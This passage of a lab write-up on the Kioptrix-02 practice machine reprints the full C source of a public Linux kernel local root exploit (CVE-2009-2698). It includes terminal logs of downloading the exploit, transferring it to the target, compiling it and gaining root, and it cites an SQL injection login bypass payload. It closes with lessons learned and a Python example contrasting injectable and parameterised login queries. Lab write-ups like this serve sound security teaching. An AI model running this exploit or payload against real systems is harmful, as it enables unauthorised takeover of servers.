The next step is to escalate privileges to root. For that we gather some key information, the most important being the operating-system version, to see whether kernel exploitation is possible. Using uname -a and lsb_release -a, the CentOS version in use is identified as 4.5.
Research shows a Buffer Overflow vulnerability affecting CentOS 4.5. This kernel vulnerability was discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team and is tracked as CVE-2009-2698. The exploit file is as follows:
/*
**
** 0x82-CVE-2009-2698
** Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
**
** Tested White Box 4(2.6.9-5.ELsmp),
** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp),
** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5),
** Fedora Core 6(2.6.18-1.2798.fc6).
**
** --
** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
** Thankful to them.
**
** --
** bash$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
** sh-3.1# id
** uid=0(root) gid=0(root) groups=500(x82) context=user_u:system_r:unconfined_t
** sh-3.1#
** --
** exploit by <p0c73n1(at)gmail(dot)com>.
**
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/personality.h>

unsigned int uid, gid;

void get_root_uid(unsigned *task)
{
    unsigned *addr=task;
    while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){
        addr++;
    }
    addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */
    addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */
    return;
}

void exploit();

void kernel_code()
{
    asm("exploit:\n"
        "push %eax\n"
        "movl $0xfffff000,%eax\n"
        "andl %esp,%eax\n"
        "pushl (%eax)\n"
        "call get_root_uid\n"
        "addl $4,%esp\n"
        "popl %eax\n");
    return;
}

void *kernel=kernel_code;

int main(int argc, char **argv)
{
    int fd=0;
    char buf[1024];
    struct sockaddr x0x;
    void *zero_page;

    uid=getuid();
    gid=getgid();
    if(uid==0){
        fprintf(stderr,"[-] check ur uid\n");
        return -1;
    }
    if(personality(0xffffffff)==PER_SVR4){
        if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
            perror("[-] mprotect()");
            return -1;
        }
    }
    else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
        perror("[-] mmap()");
        return -1;
    }
    *(unsigned long *)0x0=0x90909090;
    *(char *)0x00000004=0x90; /* +1 */
    *(char *)0x00000005=0xff;
    *(char *)0x00000006=0x25;
    *(unsigned long *)0x00000007=(unsigned long)&kernel;
    *(char *)0x0000000b=0xc3;
    if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){
        perror("[-] socket()");
        return -1;
    }
    x0x.sa_family=AF_UNSPEC;
    memset(x0x.sa_data,0x82,14);
    memset((char *)buf,0,sizeof(buf));
    sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&x0x,sizeof(x0x));
    sendto(fd,buf,1024,0,&x0x,sizeof(x0x));
    if(getuid()==uid){
        printf("[-] exploit failed, try again\n");
        return -1;
    }
    close(fd);
    execl("/bin/sh","sh","-i",NULL);
    return 0;
}
/* eoc */

// milw0rm.com [2009-08-31]
// https://raw.githubusercontent.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/master/2009/CVE-2009-2698/CVE-2009-2698.c
Next, the attacker downloads that file and transfers it to the Kioptrix-02 machine, where it is compiled with gcc. As a result, the attacker takes over the machine completely, escalating privileges to root, the administrator account on the server. The sequence of commands used is shown below.
root@kali2:~/Documents# wget https://raw.githubusercontent.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/master/2009/CVE-2009-2698/CVE-2009-2698.c
--2020-04-18 20:36:05--  https://raw.githubusercontent.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/master/2009/CVE-2009-2698/CVE-2009-2698.c
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.8.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.8.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2645 (2.6K) [text/plain]
Saving to: ‘CVE-2009-2698.c’

CVE-2009-2698.c     100%[==================================>]   2.58K  --.-KB/s    in 0s

2020-04-18 20:36:05 (71.4 MB/s) - ‘CVE-2009-2698.c’ saved [2645/2645]

root@kali2:~/Documents#
root@kali2:~/Documents#
root@kali2:~/Documents# python -m SimpleHTTPServer 9999
Serving HTTP on 0.0.0.0 port 9999 ...
192.168.216.148 - - [18/Apr/2020 20:37:57] "GET /CVE-2009-2698.c HTTP/1.0" 200 -

bash-3.00$ cd /tmp
bash-3.00$
bash-3.00$ wget http://192.168.216.149:9999/CVE-2009-2698.c
--10:37:41--  http://192.168.216.149:9999/CVE-2009-2698.c
           => `CVE-2009-2698.c'
Connecting to 192.168.216.149:9999... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,645 (2.6K) [text/plain]

    0K ..                                                    100%  360.35 MB/s

10:37:41 (360.35 MB/s) - `CVE-2009-2698.c' saved [2645/2645]

bash-3.00$ ls -l
total 4
-rw-r--r--  1 apache apache 2645 Apr 18 23:36 CVE-2009-2698.c
bash-3.00$
bash-3.00$ gcc -o privKioptrix02 CVE-2009-2698.c
bash-3.00$ ls -l
total 12
-rw-r--r--  1 apache apache 2645 Apr 18 23:36 CVE-2009-2698.c
-rwxr-xr-x  1 apache apache 6941 Apr 19 10:38 privKioptrix02
bash-3.00$ chmod +x privKioptrix02
bash-3.00$ ls -l
total 12
-rw-r--r--  1 apache apache 2645 Apr 18 23:36 CVE-2009-2698.c
-rwxr-xr-x  1 apache apache 6941 Apr 19 10:38 privKioptrix02
bash-3.00$
bash-3.00$
bash-3.00$ ./privKioptrix02
sh: no job control in this shell
sh-3.00#
sh-3.00# ls -l
total 12
-rw-r--r--  1 apache apache 2645 Apr 18 23:36 CVE-2009-2698.c
-rwxr-xr-x  1 apache apache 6941 Apr 19 10:38 privKioptrix02
sh-3.00# ./privKioptrix02
[-] check ur uid
sh-3.00#
sh-3.00#
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00#
sh-3.00# cd /root
sh-3.00# ls -l
total 80
-rw-r--r--  1 root root  1168 Oct  7  2009 anaconda-ks.cfg
-rw-r--r--  1 root root 53255 Oct  7  2009 install.log
-rw-r--r--  1 root root  3842 Oct  7  2009 install.log.syslog
sh-3.00#
sh-3.00#
Lessons Learned
The Kioptrix-02 story holds a valuable lesson for Electronic System Operators: beware of SQL Injection attacks. In this case the attacker was able to obtain a limited shell. Then, taking advantage of an operating system that had not been patched or upgraded to the latest version, the attacker took over the server completely and could carry out any criminal act at will.
To mitigate SQL Injection attacks, the characters used to fill in web-application forms should be verified. Never trust any form input; always verify it before passing it on to the backend database. Never Trust, Always Verify!
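The login bypass with admin' or 1=1# in Stage Two and the advice above come down to the same fix: form input must never be spliced into SQL text, because character filtering alone is easy to get wrong. As an added example (the page does not show the PHP behind index.php), the Python below places a string-built login query next to a parameterised one, against an in-memory SQLite table I construct here. SQLite uses -- rather than MySQL's # for a line comment, so the constructed payload ends in -- instead of #; the mechanism is identical. Names, sample users and the fixed salt are my own.

```python
import hashlib
import hmac
import sqlite3

# Constructed sample data. A fixed salt keeps the example reproducible;
# a real application stores a random per-user salt beside each hash.
SALT = b"constructed-example-salt"
USERS = {"admin": "correct horse battery staple", "john": "hunter2"}

# Constructed payload: the quote closes the username literal, "or 1=1" makes
# the WHERE clause true for every row, and the comment discards the rest.
PAYLOAD = "admin' or 1=1 --"


def hash_password(password: str) -> str:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 50_000).hex()


def make_db() -> sqlite3.Connection:
    """Build the in-memory user table shared by both login variants."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(u, hash_password(p)) for u, p in USERS.items()])
    return conn


def login_vulnerable(conn, username: str, password: str):
    """String-built query: the username becomes part of the SQL grammar, so a
    quote plus a comment marker removes the password check entirely."""
    query = ("SELECT username FROM users WHERE username='%s' AND pw_hash='%s'"
             % (username, hash_password(password)))
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username: str, password: str):
    """Parameterised query: the username is bound as data and never parsed
    as SQL; the hash comparison runs in constant time."""
    row = conn.execute("SELECT pw_hash FROM users WHERE username = ?",
                       (username,)).fetchone()
    if row is not None and hmac.compare_digest(row[0], hash_password(password)):
        return username
    return None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload :", login_vulnerable(db, PAYLOAD, "anything"))
    print("safe, payload       :", login_safe(db, PAYLOAD, "anything"))
    print("safe, real password :", login_safe(db, "john", "hunter2"))
```

The parameterised variant also fails closed on an unknown username and hashes the candidate password before comparing, so a string that is not a valid username can never match a row, whatever characters it contains.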